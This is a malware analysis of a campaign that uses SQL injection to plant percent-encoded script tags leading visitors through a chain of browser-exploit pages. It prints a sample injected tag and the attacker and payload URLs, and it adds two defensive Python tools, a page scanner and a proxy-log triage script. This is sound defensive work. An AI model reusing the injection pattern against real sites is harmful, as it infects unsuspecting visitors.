The exploit does not manifest any obvious symptoms. It usually appears on legitimate sites through SQL injection attacks that insert an invisible iframe into the previously clean page code, silently leading the unsuspecting visitor to an "outbreak" site that hosts the infection.
This attack adds a twist: the injected tag is a script element whose host name is percent-encoded, so the destination is not obvious when reading the stored content. Here is an example of this kind of injection: <script src="hxxp://%76%63%63%64%2e%63%6e/"></script>. Once the percent-escapes are decoded (%76 is "v", %63 is "c", and so on) the tag points to the infected site hxxp://vccd.cn.
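The following is an added example, not code from the original analysis or from BitDefender: a small scanner that can be run over page content pulled from a site's database (or over a crawled page) to find script and iframe tags whose src is percent-encoded or whose iframe is hidden, decode the real host name, and list the hosts worth blocking. The sample markup is constructed for the example; only the host names come from the analysis above.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample of page content as it might sit in a compromised site's
# database after the injection described above. The hosts are the ones named
# in the analysis; the surrounding markup is made up for this example.
SAMPLE_HTML = """
<div class="post">Welcome to our store</div>
<script src="hxxp://%76%63%63%64%2e%63%6e/"></script>
<iframe src="hxxp://www.hxg006.cn/b2.htm" width="0" height="0" style="display:none"></iframe>
<script src="/static/app.js"></script>
"""

# script/iframe tags carrying a src attribute (case-insensitive, quotes optional)
TAG_RE = re.compile(
    r"<(script|iframe)\b([^>]*?)\ssrc\s*=\s*['\"]?([^'\"\s>]+)['\"]?([^>]*)>",
    re.IGNORECASE,
)
# attribute fragments that make an iframe effectively invisible
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*['\"]?0\b|display\s*:\s*none|visibility\s*:\s*hidden",
    re.IGNORECASE,
)


def decode_url(url: str) -> str:
    """Undo percent-encoding until the string stops changing (covers double encoding)."""
    prev = None
    while prev != url:
        prev, url = url, unquote(url)
    return url


def scan_html(html: str, trusted_hosts=()):
    """Return one finding per script/iframe src, flagging obfuscated or hidden external loads."""
    findings = []
    for m in TAG_RE.finditer(html):
        tag, before, raw_src, after = m.groups()
        decoded = decode_url(raw_src)
        host = urlsplit(decoded).netloc.lower()  # '' for relative (same-origin) URLs
        obfuscated = decoded != raw_src          # percent-escapes were hiding the target
        hidden = bool(HIDDEN_RE.search(before + after))
        external = bool(host) and host not in trusted_hosts
        findings.append({
            "tag": tag.lower(),
            "raw_src": raw_src,
            "decoded_src": decoded,
            "host": host,
            "obfuscated": obfuscated,
            "hidden": hidden,
            "suspicious": external and (obfuscated or hidden),
        })
    return findings


def suspicious_hosts(html: str, trusted_hosts=()):
    """Unique external hosts worth blocking or hunting for, in order of first appearance."""
    seen = []
    for f in scan_html(html, trusted_hosts):
        if f["suspicious"] and f["host"] not in seen:
            seen.append(f["host"])
    return seen


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['tag']:6} {f['raw_src']} -> {f['decoded_src']}")
    print("hosts to hunt for:", suspicious_hosts(SAMPLE_HTML))
```

Decoding is applied repeatedly because an injection can be double-encoded (%2576 decodes to %76, which decodes to "v"); a single pass would report the intermediate form and miss the host. Pass the site's own CDN or partner domains as `trusted_hosts` to keep legitimate external scripts out of the report.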
The mechanism behind the infected site is shown below.
Prevention is always the better option: keep your antivirus updated, as well as any application you use, the browser and its plugins (Flash Player, RealPlayer and the other components targeted below) in particular.
Please let BitDefender disinfect your files.
Daniel Chipiristeanu, virus researcher
The mechanism used by this kind of malware-spreading campaign is rather simple and therefore effective. First it finds vulnerable sites and injects malicious code into their databases, usually through SQL injection, so that the previously clean pages now serve the attacker's content. This is similar to the method used by the "Asprox" / "Damnec" Trojan.
The malicious intent is obvious: it modifies content that the site owner published on the Internet. Not surprisingly, the URL that the visitor unknowingly loads is used for infection.
After the stealthy redirection to the outbreak site, for example hxxp://vccd.cn, the site fingerprints the browser and its plugins and tries different exploits to infect the user.
Here is the infection flow found on this website. The pages lead to one another through iframes.
The first step:
* hxxp://vccd.cn/index.html sets a cookie that expires in 1000 days and checks the User-Agent. If it is Internet Explorer it leads to hxxp://asp-18.cn/ilink.html, otherwise to hxxp://asp-18.cn/flink.html. These two pages check the Flash Player version: if the major version is 9 and the subversion is older than 115, they download a SWF file (Adobe Flash) named "i[subversion].swf" for the first page and "f[subversion].swf" for the second. These are detected by BitDefender as Exploit.SWF.Gen. The page then points to another site that continues the infection, hxxp://www.hxg006.cn/b2.htm.
* hxxp://www.hxg006.cn/b2.htm simply leads to hxxp://asp-11.cn/a2/fxx.htm. From there the following exploit pages are reached:
* hxxp://asp-11.cn/a2/ss.html contains an exploit for the Snapshot Viewer of some versions of Microsoft Access. The exploit tries to download hxxp://www.zmjjjyy.cn/new/a2.css, detected as Trojan.Dropper.Replacer.A.
* hxxp://asp-11.cn/a2/fx.html is similar to the Flash page described above and leads to the same SWF files.
* If the User-Agent is MSIE 7 (Internet Explorer 7), an invisible iframe is created for hxxp://asp-11.cn/a2/ms06014.htm, which uses the MS06-014 exploit (the RDS.Dataspace ActiveX control in Microsoft Data Access Components) to download a file detected as Trojan.Dropper.Replacer.A.
* hxxp://asp-11.cn/a2/GLWORLD.html (detected as Trojan.Exploit.JS.G) contains the Lianzhong chat room (GLIEDown.IEDown.1) ActiveX exploit, which downloads hxxp://down.hs7yue.cn/new/a4.css (Trojan.Dropper.Replacer.A).
* hxxp://jzm015.cn/sina.htm uses the "DownloadAndInstall" method exploit (Sina DLoader ActiveX control) to download hxxp://down.hs7yue.cn/down/sina.exe (heuristically detected as Generic.Malware.SYBdld.1FBF30D9).
* hxxp://asp-11.cn/a2/real.htm and hxxp://asp-11.cn/a2/real.html contain a RealPlayer exploit that checks the product version and downloads hxxp://down.hs7yue.cn/down/ko.css, detected as Trojan.Dropper.Replacer.A.
* hxxp://jzm015.cn/UU.htm exploits a vulnerability in the 'Update' method of 'UUUpgrade.ocx' that can download a file onto the affected computer. The file was unavailable at the time of analysis.
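The chain of hosts listed above is exactly what an incident responder wants to hunt for in proxy logs. The following is an added example (not part of the original analysis or BitDefender's tooling): it reads proxy log lines in a simple "timestamp client method url status" format, keeps only requests to the hosts named in the chain, and reports per client how far along the chain it got and which exploit or dropper files it fetched. The log lines are constructed for the example, the stage labels are the editor's grouping of the hosts, and the SWF files are assumed to be served from asp-18.cn because the analysis does not say where they are fetched from.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Hosts named in the analysis, grouped by the role they play in the chain.
# The role names are the editor's labels, not the original page's.
STAGES = {
    "landing": ("vccd.cn",),
    "gate":    ("asp-18.cn", "www.hxg006.cn"),
    "exploit": ("asp-11.cn", "jzm015.cn"),
    "payload": ("www.zmjjjyy.cn", "down.hs7yue.cn"),
}
STAGE_ORDER = tuple(STAGES)               # dict order: landing < gate < exploit < payload
HOST_TO_STAGE = {h: s for s, hosts in STAGES.items() for h in hosts}
ARTIFACT_EXT = (".swf", ".css", ".exe")   # exploit/dropper file types seen in the chain

# Constructed proxy log (not real traffic): "timestamp client method url status".
# The SWF is assumed to be served from asp-18.cn; the analysis does not say.
SAMPLE_LOG = """\
2008-08-01T10:00:01 10.0.0.5 GET http://compromised-site.example/products.php 200
2008-08-01T10:00:02 10.0.0.5 GET http://vccd.cn/index.html 200
2008-08-01T10:00:02 10.0.0.5 GET http://asp-18.cn/ilink.html 200
2008-08-01T10:00:03 10.0.0.5 GET http://asp-18.cn/i47.swf 200
2008-08-01T10:00:03 10.0.0.5 GET http://www.hxg006.cn/b2.htm 200
2008-08-01T10:00:04 10.0.0.5 GET http://asp-11.cn/a2/fxx.htm 200
2008-08-01T10:00:04 10.0.0.5 GET http://asp-11.cn/a2/ms06014.htm 200
2008-08-01T10:00:06 10.0.0.5 GET http://www.zmjjjyy.cn/new/a2.css 200
2008-08-01T10:05:00 10.0.0.9 GET http://vccd.cn/index.html 200
2008-08-01T10:05:01 10.0.0.9 GET http://asp-18.cn/flink.html 200
2008-08-01T10:20:00 10.0.0.7 GET http://compromised-site.example/about.php 200
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})$")


def parse_line(line: str):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    return {
        "ts": datetime.fromisoformat(ts),
        "client": client,
        "method": method,
        "url": url,
        "host": urlsplit(url).netloc.lower(),
        "status": int(status),
    }


def triage(log_text: str, window_seconds: int = 120):
    """Per client that touched a chain host: furthest stage reached, hops, artifacts fetched."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["host"] in HOST_TO_STAGE:
            per_client[ev["client"]].append(ev)

    report = {}
    for client, events in per_client.items():
        events.sort(key=lambda e: e["ts"])
        # Anchor on the first landing-page hit (or the first chain hit if the landing
        # page was missed) and only count hops inside the window after it.
        start = next((e["ts"] for e in events if HOST_TO_STAGE[e["host"]] == "landing"),
                     events[0]["ts"])
        end = start + timedelta(seconds=window_seconds)
        hops = [e for e in events if start <= e["ts"] <= end]
        furthest = max((HOST_TO_STAGE[e["host"]] for e in hops), key=STAGE_ORDER.index)
        artifacts = [e["url"] for e in hops
                     if urlsplit(e["url"]).path.lower().endswith(ARTIFACT_EXT)]
        report[client] = {
            "furthest": furthest,
            "hops": [e["url"] for e in hops],
            "artifacts": artifacts,
        }
    return report


if __name__ == "__main__":
    for client, info in triage(SAMPLE_LOG).items():
        print(f"{client}: reached '{info['furthest']}' stage, {len(info['hops'])} hops, "
              f"artifacts={info['artifacts']}")
```

A client whose furthest stage is "payload" (or that fetched a .swf, .css or .exe from a chain host) should be treated as compromised and the artifact URLs used to pull the samples from the proxy cache; a client that stopped at "landing" or "gate" was fingerprinted but, as far as the log shows, not served an exploit, which is what you would expect for a browser with a patched Flash Player.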